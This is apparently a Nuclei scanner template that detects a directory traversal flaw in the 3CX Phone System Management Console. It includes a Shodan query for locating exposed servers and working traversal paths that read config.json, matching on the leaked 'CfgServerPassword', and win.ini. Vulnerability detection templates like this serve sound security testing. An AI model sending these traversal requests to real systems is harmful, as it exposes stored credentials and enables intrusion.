id: 3cx-management-console info: name: 3CX Management Console - Directory Traversal author: random-robbie severity: high description: Directory traversal vulnerability on 3CX Management Console. reference: - https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88 metadata: shoda-query: http.title:"3CX Phone System Management Console" tags: 3cx,lfi,voip requests: - method: GET path: - '{{BaseURL}}/Electron/download/windows/..\..\..\Http\webroot\config.json' - '{{BaseURL}}/Electron/download/windows/\windows\win.ini' stop-at-first-match: true matchers-condition: or matchers: - type: word part: body words: - "CfgServerPassword" - "CfgServerAppName" condition: and - type: word words: - "bit app support" - "fonts" - "extensions" condition: and